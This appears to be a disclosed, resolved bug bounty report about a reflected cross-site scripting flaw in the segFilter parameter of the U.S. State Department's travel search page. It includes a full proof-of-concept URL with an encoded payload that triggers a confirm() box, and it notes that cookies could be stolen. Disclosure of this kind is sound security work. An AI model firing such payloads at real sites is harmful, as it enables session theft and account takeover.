Loading HuntDB...

RXSS on https://travel.state.gov/content/travel/en/search.html

Medium
U
U.S. Department of State
Submitted None
Reported by tmz900

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Reflected
## Summary: Hello team, I Found RXSS via `segFilter` parameter on url : `https://travel.state.gov/content/travel/en/search.html/?search_input=hello&data-sia=false&data-con=false&search_btn=&segFilter=x%27%29%3bconfirm%28%271` Open url, you will see an alert box pop up: {F2096019} ## Impact Steal session cookies to account takeovers execute JS code

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-site Scripting (XSS) - Reflected